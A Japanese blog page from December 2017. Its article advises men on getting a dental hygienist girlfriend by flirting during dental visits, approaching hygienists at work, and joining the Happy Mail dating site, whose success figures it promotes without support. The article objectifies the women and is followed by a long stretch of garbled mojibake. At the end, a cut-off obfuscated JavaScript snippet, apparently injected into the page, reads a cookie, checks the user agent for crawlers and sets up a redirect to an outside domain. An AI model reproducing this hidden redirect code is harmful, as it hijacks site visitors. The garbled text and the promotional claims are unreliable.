2017年 12月 の投稿一覧

歯科衛生士の彼女を作るためにすべき4つの方法

歯医者さんにいって、歯科衛生士さんに治療をしてもらっているとき、顔が近すぎて思わずキスをしているような感覚になりドギマギしてしまう経験はありませんか?

治療中に不謹慎だけど、触れてみたい、キスしてみたい、エッチをしてみたい、付き合いたいなどいろんな妄想をしてしまいませんか?

今回は歯科衛生士の彼女を作るためにすべき4つの方法を紹介したいと思います。

歯のメンテナンスに定期的に通う



筆者の友人に歯科衛生士がいますが、結婚した相手は、患者さんでした。

その友人に体験談を語ってもらいました。

ご主人と付き合うようになったきっかけって何だったの?

1年ぐらい通ってくれていた患者さんだったから、何となく治療中でも世間話をするようになったの。

そのうち向こうから連絡先を書いた紙を渡されたわけ。

相手の職業や勤め先も治療中の会話で話をしていたから、安心して会えたよ。

歯科衛生士って男性との出会いがないから積極的にグイグイ来てくれたからついつい付き合っちゃったのよね。

会話から想像できると思いますが、歯科衛生士さんは職場での出会いはほとんどないと言っていいでしょう。

男性は、歯科医か患者さんか歯科材料を持ってくる営業マンかです。

歯科医院では他にも歯科衛生士さんがいるので、職場恋愛はなかなか難しい状況です。

歯科衛生士さんの彼女を作りたいなら、3か月に1回、定期的に歯のメンテナンスに通い、少し慣れてきたら、歯の話以外もしてみてください。

初めはなかなか会話にならないでしょうが、頑張って話をしているうちに、少しずつ打ち解けてくれるような雰囲気になれば、彼女になってっくれる可能性は大です。

そうなれば、幸運なことに、歯科では個別ブースに分かれているので、コッソリと連絡先を渡すこともできます。

もし、断られたらしまってもあきらめる必要はありません。

その人とは縁がなかっただけなので、別の歯科医院でも同じように挑戦してみてください。

歯科衛生士さんは出会いに飢えていますので、必ず彼女になってくれる人がいます。

歯科衛生士をナンパする

クラブや道で適当にナンパをしても、歯科衛生士の彼女は作るのはなかなか大変でしょう。

最近の歯科医院はコンビニほどの数があり、歯科医院単独である以外に、駅の商店街やショッピングモール、デパート、オフィスビルの中にもあります。

そういったところで働いている男性は、歯科衛生士の彼女ができるチャンスが多いと言えます。

歯科医院に行けばわかると思いますが、ほとんどの歯科衛生士は20代でしかもきれいで、スタイルもよい女の子です。

歯科衛生士は、職場と家の往復で男性と出会えるチャンスはないため、もし会社が歯科医院と同じビルにある場合は、エレベーターや廊下、ビルの出入り口で毎日のように顔を合わせる機会があると自然と話ができるためこれはチャンスです!

そういった自然の流れを利用するには、まず歯科医院で顔見知りになってから、話しかけてみるのがコツです。

このパターンで交際に発展した歯科衛生士は何人もいます。

出会い系サイトのハッピーメールに登録する



ハッピーメールは、のべ1400万人以上の日本で一番会員数を誇る出会い系サイトであり、サクラがいないことでも有名です。

出会える確率は74.5%であり、安全で優良なサイトであることで、セフレや結婚相手までも出会えることで会員数も毎月増えています。

出会い系サイトで歯科衛生士の彼女なんてできるの?」と思う人もいますが、それができるのがハッピーメールのスゴイところです。

ある日の歯科医院での昼休みのありふれた日常会話を紹介します。

歯科衛生士の女の子たちは、職業柄女性ばかりで仕事をしているため、普段の会話も「自分に合う男性いないかな?いたら紹介して!」と情報交換の場になっています。

そんな時に出てくるフレーズが、「出会い系サイトってちょっと抵抗あったけど、真面目できちんとした男性に出会えたよ。ハッピーメールってとこだよ。」「じゃあ、わたしも登録してみよう。」と何人もの歯科衛生士が登録しているのが「ハッピーメール」です。

こういった出会いを求めている歯科衛生士の女の子がたくさん、ハッピーメールに登録しているので、歯科衛生士の彼女を作りたいなら、ハッピーメールに登録するのが一番の近道でしょう。

歯科衛生士の登録人数が多いとそれだけ出会える数も多いので、出会い系サイトはきちんと選んで登録したほうがいいですね。

ハッピーメールの職業別で検索する



歯科衛生士の彼女をハッピーメールで作りたいと思うなら、まず、職業別で検索して探すことをおススメします。

ログイン画面のコミュニティ画面に「プロフィール検索」がありますので、「設定ボタン」を押すと、一番下に「職業」のタブがあるので、医療関係にチェックを付けておきます。

他にも設定で、地域、年齢、身長、スタイル、ルックスを細かく指定できるので、自分の好みがハッキリとしている人はきちんと設定することが大切です。

ハッピーメールは女性会員のプロフィールを何人見ようと一切お金はかかりませんので、歯科衛生士の女の子のプロフィールが見つかるまで全く無料で利用できます。

例えば、自分が住んでいる地域で歯科衛生士の彼女を作りたいなら、お好みの女の子が見つかるまで、一切ポイントを使わずに無料でじっくりと比較検討もできます。

歯科衛生士は、出会いを求めるため友達と一緒にハッピーメールに登録して、気軽な感じで多くの男性と付き合っています。

今日すぐにでも歯科衛生士の女の子とエッチをしたい場合は、「大人の掲示板」のカテゴリーを「大人の出会い」にして、該当する女性にメールを送ってみてください。

30分ほど待てば、3人ほどの女性からメールが来るので、あとは、お好みの女の子を選ぶだけです。

エッチだけの関係で終わってもいいし、彼女になってもらうこともあるでしょうし、ハッピーメールがきっかけとなって、出会いが始まります。

まとめ

歯科衛生士の彼女を作るためには、自分から出会いを求めていく必要があります。

出会い系サイトのハッピーメールを利用することで、より一層出会える確率が大きくなるため、一度登録して、実際に女の子のプロフィールを見てみたらいかがでしょうか?

待っているだけではチャンスは訪れないので、まず行動に移して歯科衛生士の彼女を作れるように努力してみるのもひとつの手段です。

a??a?i??a??a?i??ai???ai???ai??i??a?i??a??a??ai??i??a??a??ai??i??a??ai??i??i?i??a?i??a?i???i?????i??

ai???a??a?i??a??a?i??ci??i???i??i??a??cY?ai??Sa??a?i??a?i??a??a??a?i??a??a??a?i??ai???a??a?S?i??i??a??a?i??ci??i???i??i??a?i???i???ai??i??ai??sa?i??a???i???a?i??a??a?i??a??ai???ai??i??a?i??a??ei???ai??i??a?i??a?i??a?i??a?i??a?i??a?i??a??ai???a??a?i??ci???a??a?i??ci??i???i??i??a??cY?ai??Sa??a?i??a?i??a??ei???a?i??a??ai???a??a??ai??i??a??ai??i??a??a??ai??i??a??a??a?Sa?i??ai??i??a?i??a?i??ai??i??a?i??ai??i??

a??ai??i??a???i???a?i??a?Sa?i??a?i??ai???a?i??a?Ya?i??a??ai???a??a?i??a??a?i??ai???ai?????i??ai??i??a??a?i??a?i??aSi??ai???a?i??a?i??ai??i??

??i???i?????i??ai??i??e?i??c??ai???ei???ai???a??a?i??a??a?i??ai???ai?????i??ai??i??a??a?i?????ci??i??a?i??a??ei???a??a??ai??Sai???ei???a?i??a???i??i??a?i???i???ai??i??a?Ya??a?i??ai??i??a?i??aSi??a?i??ai???a?i??a?i??a??a?i??ai??i??

a?i??a?i??a??ai???a??a?i??a??a?i??ai???ai???a??a?i??a?i??ci???ai??sa?i??ai???a?Y?i???ai??i??ai???a?i??a?i??a??e?i??c??a?i??a?i??a??a?i??a??a?i??ai???ai???a?i??a?i??aSi??a?i??a?i??ai???c??a?i??a?i???i???a??ci???ai??sa?i??ai???a?Y?i???ai??i??a?i??a??a?i??i??

a??a?i??a??a?i??ai???ai???a?i??a?i??a?Yai??i??ai???ci???a?sa??a?i??ai??i??ai?????i??a??a?i??a??e?i??a??a?i??ai???a?sci???a?i??ai??i???i??i??a??a??a?i??e?i??ai???ai???ai??i??a?i??a??a??a??a?sa??a?i??a?i??a?i??ai???a??a?i??ai??i??a?i??aSi??a?i??ai??i??a?i??a?i??a?i??a?i??ai??i??

a?i??ai??i??ai???a?Ya?i??a??a?i??a?i??aSi??a?i??a?Ya?i??a?i??a?i??a??a??a??a??ai??????a??a?i??ai??i??a?i??a?i??ai???a??a??ai??i??a??ai??i??a?Yai???a?i??a??ai??i??a??a??ai??i??a??a??ai???a??a?i??a?Yi??

??Sa??ai??Se??a??a?i??a??a?i??a??a?i??ai???ai???a?i??a?i??aSi??a?i??ai??i??



a??a?sai???a??a?i??a??a?i??ai???ai???a?i??a??a??ai??i??a??a??ai??i??a??ai??i??a?Sa?i??ai???a?i??ci???a?Sai??i??ai???a?i??a?Ya?i??a?i??a??ai?????Sa??ai??Se??a??a?i??a??a?i??a??a?i??ai???ai???a??a?i??a?i??aSi??a?i??a?i??ai??i??

a??ai??i??a??ai??i??ai???a??a??ai??i??a??ai??i??a?i??a??a?i??a?i??ci???ei???ei???a??a?i??a??ai???a?i??a?i??a?i??a???i??i??a?i??cY?ai??Sa??a?i??ai??i??a?Ya??a?i??ai??i??a??ai??i??a?i??a??a?i??a?i??ci???a?i??a?i??ai??i??

a??a?i??ci???a?i??ai?????Sa??ai??Se??a??a?i??a??a?i??a??a?i??ai???ai???a??ai???ei??i??a?i???i??i??ei??i??ai??i??a?i??ci??i??a?i??e?Za?i??a?i??a?i??a??a??ai??????ai??i??a?i??a?i??ai???a?i???i???a?i???i??Ya?sa??a?i??ai??i??ai??sa?i??a?i??a?i??ai???a???i??i??a??a?Ya??a?i??ai??i??cY?ai??Sa??a?i??a?i??a??a??a?i??a??ai???a??a??ai??i??a??ai??Sai??i??a?i??a?i??a??e?i??a??ai??i??a?i??a?i??ai??i??a?i??ai??i??

a?i??a??ai?????Sa??ai??Se??a??a?i??a??a?i??a??a?i??ai???ai???a??a??a?i??a?i??a??a?i??a?i??a??ai???ai???e??csi??a??ai??i??a?i??a??ai???c??ai???a??a?i??a??a?i??ai???ai???ai???a?i??a?i??ai??i??

??i???i?????i??ai??i??e?i??c??ai???ci??S??i??a?i??e?i??ai???a?i??e??a??a?i??a?i??c??ai???a??a?i??a??a?i??ai???ai???a????i??ai??i??a??ei??i????Yei??i??a?i??ai???a?Yai??i??ai??i??a?i??a??ai??sa??ai???a??a?i??a??a?i??ai???ai???a?i???i???a?i??a??ai??i??a?i??ai??i??e?zai???a?Yai??Sai???a?i??e?i??a?i??a?i??a?i??aSi??a?i??ai???ai??i???i???ai??i??ai??sa?i??a?i??a?i??ai??i??

ai??i??a?i??a??e?zai???ai??i??a??a?i??ai???a?i??e?i??a?i??a?Yai??Sa?i??ai??i??a?i??a??ei???a?i??a?i??ai???a??a??ai???ei??i????i??a?i??a?i??a?i??a?i??aSi??a?i??ai??i??a?i??a?i??a?i??a?i??ai??i??a?i??ai??i??

a?Ya?i??ai???a?i??a?i??a?i??a??a?Yc??ai???a??a?i??a??a?i??ai???ai???a??a??a?i??a?i??ai??zai??i??a?i??ai??i??ai??i??a?i??a?i??a??a?i??ai??Sa??a?i??ai??i??a?i??a?i??ai???c??ai???a??ci???ci??Ya?i??a?Ya??a??a?i????i??ai??i??ai??i??e??a??a?i??aSi??a?i??a??a?i??ai??i??a?i??ai??i??

a?Ya?i??ai???c??ai???a?i??ei??????a?i??ai???a??a?i??a??e?i??c??a?i??a?i??e??a??a?i??a??a??ai??i??ei???a??a?i??a??ai??i??ai??sa?i??a?i??a?i??????i???a??a?i??ei???a?i??a?i??ai??i??

c??ai???a??a?i??a??a?i??ai???ai???a??e?za??a?i??ei???aS?a??a?i??a?i??a??ai???a?i??ci??i??a?i??e?Za?i??a?i??a?i??a??a?i??ai???ai??Sai???ei??i???i???ei???a??eS?ci??Ya??ai????i??i??a?i??a??ai??i??ci??i???i??i??a??a?i??a?Ya??a??a?i??ai???ei???a?i??a??ei???ai??i??a?i??ai??i???i??i??a?i??a?i??a?i??ai??i??a?i??ai??i??

e??e??a?i??a???i??i??a??ai???a?Ya??a?i??ai??i??a??ai??i??a?i??a??ai??i??a??ai??i??a??a?i??

a?i??a?i??ai???a??a?i??a??a?i??ai???ai???a?i??a?i??aSi??a?i??a?i??ai??i??ai???a??a?i??a?i??a?i?????ai??i??e?za?i??a?i??a??a??a??ai??????a?sai???ai??i??a?i??ai???ai???ai??Sa?i??ai??i??ai???ai???ai???a?i??a?i??a??a?i??a?i??a??a??a?i??ai??Sa??a?i??ai??i??

a?i??a??a?i??ai???c??ai???a??a?i??a??a?i??ai???ai???a??a?i??a?i????Sa??ai??Se??a??a?i??a??a?i??a??a?i??ai???ai???a?i??a?i??aSi??a?i??a?Yai???a??ai???e??e??a?i??a???i??i??a?i??ei??i??a?i??a?i??a?i??a??a?i??a?i??a??a?i??a?i??a?i??i??

a??ai??i??a??a??a??ai??i??a??ai???a???i???ai??i??a??a??ai??i??a??ai??i??a?Yai???a?i??a??a?i??a??a?i??ai???ai???a?i??a?i??aSi??a?i??a?i??a?i??ai??i??ai???a?i??a?i??a??a??a??ai???e?i??c??a?i??a?i??a?Yai???a?i??a??a?i??a??a?i??ai???ai???a?i??a?i??aSi??a?i??a?i??a?i??ai??i??a??a?i??a?i??a?i??a??ai??i??ai???ci??i??a??a?i??a??ai???a??a?i??a?i??a??a?i??a?i??a?i??i??

??i??ai??i??a?i??ai???a???i??i??a?i???i???a??ei??i??ai??i??a?i??a?i??a?i??a?Yai??i??ai???ai???ai??Sa?i??ai??i??ai???a?Sai???a?i??a?i??a?i?????a?Yai??i??a?i??i?Yai???a???i???ai???ai???a?i??a?i??a??a?i??ai???a???i??i??a?i??ai??i??ai??i??ei??i??e?i??a?i??a??a??ai???ai???ai???a?i??a?i??a??a?i??a?i??a?i??ai???a??a?sa??a??a?i??a??a?i??ai???ai?????i??ai??i??ai??i??a?i??a??a?i??ai??Sa??ei??i??a?i??ai??Sa??a?i??ai??i??a?i??ai??i??

a?i??ci??Y?i???ai???a?i????i??ai??i??a?i??ai??i??ai???ai??i??ei??i??a?i??ai???a?i??ai???ai???ai??Sa?i??a???i??i??a?i??ai??i??ei??i??ai??i??ci??i??ai??i??ai??i??ai???a??a?i??a??ai??i??a?i??a?i??ai??i??a?i??ai??i??

a?Ya?i??ai???a??a??a?i??a??a??a?i??a?i??a??a??a?Ya??a??a??ai???a???i??i??a??ai???a?Ya??a?i??ai??i??a??ai??i??a?i??a??ai??i??ci?????i??csi??a?i??a?i??ai??i??a?i??a??a??a?i??ei???a??a?i??a??ai??i??a?i??ai??Sa??a?i??a??ai???a??a?i??aSi??a?i??a??a??a?i??a??a?i??a??ai??i??a?i??a??a??a??a?sa??a?i??a?i??a?i??ai???ci??i??a?i??ai???a?i??ai??i??a?i??ai??i??a?i??a?i??a?i??a?i??a?i??a??a?i??a?i??a?i??a??a??a?i??ai??i??a?i??ai??i??

e?i??c??a??a?i??a??a?i??ai???ai???a??a?i??a?i??ai???a???i??i??a??ai???a?Ya??a?i??ai??i??a??ai??i??a?i??a??ai??i??a??ai??i???i?????i??a??ai???a??a?i??c??ai??i??a?i??a??a?i??ai??i??

a?i??ai???a?i??ai???a??a?i??ei??Za?i??a??a?i??a??a?i??ai???ai???a?i??a?i??aSi??a?i??ai??i??



a??a?i??a??a?i??ai???ai?????i??ai??i??a?i??a???i??i??a?i??ai??i?????ci??i??a?i??ai???ai??i???i???a??ai???ci???e?i??ei??Sa??a???i???a?i??a?i??ai??i??

a??a?i??a??a?i??ai???ai???a??ai???a?i??a??a?i??a?i???i????i??i???Si??a??a?i??ai??i??a??a?i??a?i??a?i??a??ai??i??a?i??ai??Sa??a?i??a??ai???ci???e?i??ei??Sa??a?i??a??a??a?i??a??a??a?i??ai??i??a?i??ai???ai??i???i???a??ai???ai???ai??Sa?i??ai??i??a?i??ei??i??ai??i??ci??i??a??e?i??a?i??a??a?i??a?i??ai???ei???ai??Sa??a?i??a??a?i??ai??Sa??a?i??ai??i??

a??a?i??a?Yai???ai???a??a?i??a??a?i??ai???ai???a?i??a?i??aSi??a?i??ai??i??a??ai??i??ai???a?i??ai???ai??i??a??a?i??ei??Za?i??a??a?i??a??a?i??ai???ai???a?i??a?i??aSi??a?i??a??a?i??ai??i??a?i??ai??i??

a?i??a?i??ai???a?i??a??a??a?i??a??a?i??ai???ai???a??a?i??ai??i??a?i??a??a?i??a?i??a??ai???a?i??aYYa?i??a?i??a???i???a?i??ai???ei??sai??i??ei???a?i??a?i??ai???ci???ei??i??ai???ai??Sai???ai???a?i??a?i??ai??i??a?i??ai??i???i??i??a??ai??i??ai???a?Sc?i??ai??Sa?i??ai???ai???a??a?i??ai???a??ai??i??a??a??ci??i??e?Za?i??a??ai??Sa??a?i??a??ci??i???i???a??a??a?i??a?i??e????i??a??a?i??ai???ai??i??a??ai???a??a??a??a??a?i??a???i???ai??i??a??a??a?i??a??a?i??ai???ai???a??a?i??ai??Sa??a?i??ai??i??

a??a?i??a?i??a??a?Ya??a?i??a??a?i??ai???ai???a?i??ci???e?i??ai??i??ci???ai??i??a?i??a?i??a??a??a?i??ai??i??a?i??ai??i??

a?i??a?i??ai???a?i??a??ai???a??a?i??a??a?i??ai???ai???a?i??a?i??ai???a?sa?i??ai??i??a?i??ai??i??a?i??ai??i??a?i??ai???a??a?i??ai??i??a??ai???ci???e?i??a??ei??Sa??a?i??a??e?i??ai??i??ai??i??a??a??a?i??a??ai??i??ai??i??a?i??ai??i??a??ai??i??a?i??a?i??ai???a???i??i??a??a?i??ai???a?Ya??a?i??ai??i??a??ai??i??a?i??a??ai??i??a?i??ai??Sai??i??a?i??a??a??ai??Sa??a?i??ai??i??

a??a?Yai???ci???a?scsi??a??ei??i??a??ai??i??a?Sa??ai??i??a?i??a?i??ai???ai??i??a?i??a?i??a?i??ai??i??a??a?sci???a??a?i??a?i??a??a?sa?i??ai??i??a?i??ei??i??a?i??ai??i??a?Sa??ai??i??a?i??ai??i??a?i??ai???a??a?i??ai??i??ai??i??

ai??s??Ycsi??a?i??a?i??aSi??a?i??ai??i??

?i???a?i??ai??i??a?i??a??a?i??a??ai???a??a?i??a??a?i??ai???ai???a?i??a??ai??s??Ycsi??a?i??a?i??aSi??a?i??ai??i??a?i??a??a?i??a?i??ai??i??

a??a?i??a??a?i??ai???ai???a?i??a?i??aSi??a?i??a?i??ai??i??a??a??a??ai??????a??a?i??a?i??ai??i??e?zai???ai???a?i??a???i???a??a?i??a??a?i??a??a?i??ai???a?i??ai??zai??i??a?i??aSi??a?i??ai??i??a?i??a??a??ai??i??a?i??a?i??a?i??ai??i??

ei???a?i??a?i??a??ai??i??a?i??a?i??ai??i??a?i??aYYa?i??a??a?i??a??a?i??ai???ai???a??ai??i??a??a?Sa?i??ai??i??a?i??ai???a??ei???a?i??a??ai??i??a??ai??i??a?i??a?i??a?i??aSi??a?i??a??a?i??a??ai???e?i??ai??i??ei??sa??a?i??ai??i??ai??i??a??a??a?i??ai??i??ai??i??

a?i??aYYa?i??a??a?i??a??a?i??ai???ai???a?i??a??ai????i???ci???e?i??a??a?i??a?i??aSi??ei??i??a?i??a??e??a??ei???e??a?i??ai??i??a?i??ai???a??a?i??ai??i??a??ai???a?i??aSi??ei??i??a?i??a??a?i??ai??i??a??a?i??a??a?i??aSi??a?i??ai??i??a?i??a??ai??i??a?i??ai??Sai???a?i??a??a?i??ai??Sa?i??aSi??a?i??a?i??ai???ai???ai??Sa??ai???ei???a??a??a??a?i??a?i??ai???a?i??ai???c??ai??i??a?i??ai???ai??i??a?i??a??ai??i??a?i??ai??Sa??a?i??ai??i??

ai??s??Ycsi??a?i??a?i??aSi??a?i??a?i??a?i??ai???a?i??ai???a??e?i??ai??i??ai??i??ai??i??a?i??a?i??a??ai??i??a?i??ai??Sai???ai??i??ai??i??ai??i??a?sci???a?i??a??a?i??a??a?i??ai???ai???a?i??a?Se??a?i??a?i??e??a??a??a?i??a?i??ci??i??ai???a?i??a??ai??Sai???a??a?i????i??ai??i??a?i??ai??i??ei??i??ci??sa?Sa?i??ai??sa??a?i??a???i??i??a??cY?ai??Sa??a?i??a?i??a??a??ai??????a??a?i??ai??i??

e?i??c??a?i??a??a?i??a??a?i??ai???ai???a?i??ai??i??ai???ai??s??Ycsi??a?i??a?i??aSi??a?i??a?i??a?i??ai???a?i??ai???a??a?i??e?i??c??a?i??a?i??ai???a?sa??a?i??a?i??a?i??a??ai??i??a?i??ai??Sa??a?i??ai??i??

a??a?i??a??ai???a?i??ai???a?Sei??i??ai??i??a??a??ai???a?i???i??i??a?i??ai???a??ei???ai??i??a?i??ai??i??a?i??ai??i??a?i??a?i??a??a?i??ai??i??ai??i??

a??a??a?i??a??a??a?i??a?i??cZi??ai???a?i??a?i??ci??i??ai??i??e??a?i??ai??i??



a?i??ai???a??a?i??a?i??a?i??a?i??ei??i??ai???a?i??a?i??a??a?i??a??ai???a?i??ai??i??c?i??a?i??a??a?i??a??a?i??ai???ai???a?i??ci???e?i??ai??i??ci???ai??i??a?i??ai??i??ai???a??a??a?i??a??a?i??cZi??ai???a?i??a?i??ci??i??ai??i??e??a?i??a??a?i??ai??i??a?i??ai??i??

a??a??a?i??a??a?i??a??ai???a?i??ai???a??a?sai???ai???a??a?i??ai???ai???a??ai???a?Ya??a?i??ai??i??a??ai??i??a?i??a??ai??i??a??ai??i??a?i??ei???a??a?i??ai??i??a?i??a?i??ai???ei???ci??i??a??a???i??i??a?i???i???a??cY?ai??Sa??a?i??a?i??a??a??ai??????a??a?i??ai??i??

a??ai??i??a??a??ai???e?i????i??a?i??ci???a?i??ai??i??cY?ai???a??a?i??ai??i??a??ai???ai???ai???a??a?i??a?i??ei???c?i??a??a?i??ai??i???i???ai???ai??i??ai???ai??i??a?i??ai???ei???ci???ai???a?i??a?i????i??ai??i??a?i??a??a?i??ai???a?i??a?i??a?i??a??a?i??a?i??a?i??ai???a??a??ai??i??a??ai??i??a??ai??i??a??a??a?i??a??a?i??a??a??a?Y?i???a??ei???a?i??a?i??a?i??ai??i??a?i??ai??i??

a??a?i??ai???ai???ai??Sai???ai??i??a?i??ai??i??ai???a??a??a??a?i??a?i??ai??i??cY?ai???a??a?i??ai??i??a??ai???a??ai???a?i??ei??i??a??a?i??ai??i??a?i??a??a?i??ai??i??a???i???a?i??a??a?i??ai??i??

a?Ya?i??ai???a??a??a?i??a??a?i??a??ai??i??a?i??a??a?i??ei???ei???a??a?i??a??ai???ai???a?i??a?i??ai??i??ai???a?i??a??a?Yai???a??a?i??a??a?i??ai???ai???a?i??ci??i??csi??ai???ai??i??ci??i??a??a?i??a??ai???a??a?i??a?i??a??a?i??a?i??a?i??ai??i??

ai???a??a??ai??i??a??ai??i??a?Yai???a?i??ai???a??a?i??a??a?i??ai???ai???a?i?????a?i??a??a??a?i??a??a?i??a?i??a?i??a??a?i??ai???a??ai???ai??Sa??cY?a??a?Yai??i??e?i??e?i??ai??i??e?i??a?i??a??a?i??a?i??ai???ai???ai??Sa?i??ai??i??a??a?i???i???ai???ai???a??a?i??ai???a?i??a?i??a?i??ai??i??a?i??a??a??ai??i??a?i??a?i??a?i??ai??i??

a??a?i??a??a?i??ai???ai???a??a?i???i??i??ei??i??a?sa??a?i??a?i??a?i??aSi??a?i??ai??i??

??Sa??ai??Se??a??a?i??a??a?i??a??a?i??ai???ai???a?i??ai???a???i??i??a??ai???ei???a??a??ai??i??a??a??a??ai???a??ai????i??i??ei??i??a?sai???a?i??a?i??ai??i??

e?i??c??a?i??a?i??a??a?i??a??a?i??ai???ai?????i??ai??i??a??ai????i???a?i??ai???a?i??ai??i???i??????a??a?i????i??ai??i??a?i??ai???ai???a??ai???e?Za?i????i??ai??i??a??a?i??a?i???i???ai???a?i??a??ai??Sa??a?i??ai??i??

a?i??a?i??a??a?i??ai?????i???i?????i??ai??i??e?i??c??c?sa?i??c??ai???a?i??a??ai???e??ai???ai???ai??i??a?i??a??a??a?i??ai??Sa??a?i??ai??i??a??ai???ai???e?Za??a?i??a?i??a?i??ai???a?i???i???a??a??a?i??a??a?i??ai???ai???a?i??csi??a?i??ai??i??a?i???i??i??aS?a???i??Yei???a?i???i??i?????a??a?i??ai??i??ai????i??i??ei??i??a?sai??i??ei??i??a??a?i??a??a??ai??sa?i??a?i??a?i??ai??i??

?i??i??ei??i??a?sa?i??a??ai???ai??i??a?i??a?i??a?i??ai??Sa?i??a?i??a???i??i??c?i??ai??i??a?Sei??i??ai??i??ai???a??a?i??a?i??a?i??ai??????ei??i??a??a?Sei??i??a??ai??????a??a?i??a??a?Ya???i??i??a??a?Sei??i??ai??i??a?i??ai??i??a?i??a??ai??i??a??e??a?i??ai???ei???ci???ai???a?i??a?i????i??ai??i??a?i??ai??i??a??a??a??ai???a??a?i??a?i??a?i??a?i??ai??i??

?i??i??ei???a?sa??ei???ci??i??a?i??aSi??a?i??a?i??a??a??ai??sa?i??a?i??a?i??ai???ci?????i??csi??a?i??a?i??aSi??a?i??ai??i??a?i??a??a??ai???ai???ai??Sa?i??ai??i??a?i??aSi??a?i??a?i???Zi??a?i??ai??i??a?i??a??a?i??ai??i??a?i??ai??i??

a??a?Sai????i??i??ei???a?sa?i??a?i??ai??i??a??a?Ya?i??a?i??a?i??a?i??ai???a?i???i???a??a?i??a?i??ai???ai??i??ci???a?i??a??a?i??ai???a?i??a?i??a??a?i??ai??i??a?i??ai??i??

a?i??a?i??a?i??ai??i??a??a?i??a?i??ei???ei??i??a?i??a?i??ai??i??ai???a??a?i??ai??i??

a?i??ai???a?i???i???a??ci?????i??csi??a?i??ei??i??ai??i??a?i??ai??i??



a??a?i??a??a?i??ai???ai???a?i??a??a??ai??i??a??ai??i??esi??a?i??ai???ci????i??i??a??a??a?i??a??a?i??ai???ai???ai???ei??i??a?i??a?i??a?i??a??a??a??ai???a?i??ai???a?i???i???ai??i??ci????i??i??a?i??a??ai??i??a?i??a??a??a?i??ai??Sa??a?i??ai??i??

ci???a?i??ai???c??ai???a??a?i??a??a?i??ai???ai???a??e?i??c??a?i??a?i???i???a?i??a??a??a?i??a??c?z?i???a?i??ai????i???a?i??ai???a?i??a??ai???a??a?i??ai???a?i??ai??i???Zi??a?i??ai??i??ai???ai??i??a?i??a?i??a?i??ai??i??aSi??a??a?i??a??ai??Sa??a?i??a?i??a?i??ai?????i??ai??i??a?i??a?i??ai??i??e?i??c??a?i??a?i???i???a?i??a??ci?????i??csi??a?i??a?i??ai??i??a?i??a?i??a?i????i??ai??i??a?i??ai???ei???a??a??ai??Sa??a?i??ai??i??a?i??ai??i??

ai??Yesi??a?i??ai?????i???i?????i??ai??i??e?i??c??a?i??a??ai???a??a?i??a??a?i??ai???ai???a??e?i??c??a?i??a?i???i???a?i??ci???ai??sa?i??ai???a?Y?i???a??a?Sai??Sa??a?i??ai??i??

a??a?i??a??a?i??ai???ai?????i??ai??i??ai??i??ei??sa??a?i??ai???ei??i??a?i??a??a?i??a?i??ai??i??ai???ai??i??ei??i??a?i??a??a??a?i??a??a??a?i??a?i??a??a?Ya??a?i??a?i??a??a?i??a?i??ai??i??

e?i??c??a?i??a?i???i???a??ai?????i??a?i??a?i??ai??i??ai??i??a???i???a?i??ai??i??a?i??a?i??ci??Y??i??ai??i??a?i??a?i??a?i??a??a?i??a?i??a?i??ai???a??a??ai??i??a?i??a??ai??i??a??a?i??a?i??a?i??a??ai??i???S?a??a?i??a?i??a?i??ai???ci?????i??csi??a?i??ai???a?Ya??a?i??ai??i??a??ai??i??a?i??a??ai??i??a??ai??Sa??a?i??ai??i??a?i??ai??i??

a??a?Sai???c??ai???a??a?i??a??a?i??ai???ai???a?i??ei???ai??i??a?sai???a??a?i??a??a?i??ai???ai?????i??ai??i??a?i??esi??a??ai???a??a?i??a??a?i??ai???ai???ai???ei??i??ai???ai??i??a?i???i???a??a??ci?????i??csi??a?i??ai???a?Ya??a?i??ai??i??a??ai??i??a?i??a??ai??i??a??ai??Sai???a??ei??i??ei???a?i??a?i???i???ai??i??ai??i??a??a??a?i??a??a?i??ai??i??a?i??ai??i??

cY?ai??Sa??a?i??ai??i??a?i??ai??i??a?i??ai??i??a??a??a?i??a?i??a?i??a??ai??Sai???a?i??a?i??a?i??a??a??a??a??a??c?i??a??ai??i??a?i??ai??i??a?i??a?i??ai??i??

a??a??ai???

a??a?i??a??a?i??ai???ai???ai??i??a?i??a??a??ai??i??a??a??ai??i??a??ai??i???i?????i??ai??i??a?i??c??ai??i??a?i??a??a?i??a?Ya??ai???ei???ei???a??a?i??a??ai???a??a?sa??a?i??ci??Y?i???ai???a?i??a??a?i??a??a?i??ai???ai?????i??ai??i??ai??i??a?i??ai???ai???ai??Sa?i??ai??i??a?i??ei??i??a?i??ai??i??a?Sa?i??ai??i??a?i??a??a?i??a?i??ai??i??

a???i??i??a??a?i??ci??Y?i???ai???a?i??ai???a?i??a???i???ai??i?????a??a??a?i??a?i??ai???a??a?i??a??a?i??ai???ai?????i??ai??i??a??ci???a?scsi??a??ei??i??a?i??ai??i??a?Sa??ai??Sa??a?i??ai??i??

a??a?i??a?i??ai???a???i??i??a?i??cY?ai??Sa??a?i??ai??i??a?Ya??a?i??ai??i??a??ai??Sai????i??i??a?i??a??ai??i??a???i??i??a?i??a??ai???ai???a??ai???a?i??ai??i??a?i??a??a?i??a?i??ai???

a?i??ci??Y?i???ai???a??ai???ai??i??ei??i??a?i??a??ai???a?Ya???i??i??a??ai??i??ai???a?i??a??a?i??a??a??a?i??a??a??a?i??a??ai???a??a?i??a?i??a?i??ai???a??a??a??a?i??a??a?i??ai???ai?????i??ai??i??a?i??a?i??aSi??a?i??a?i??a??a?i??a??a?i??a?i??a?i??i??var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== 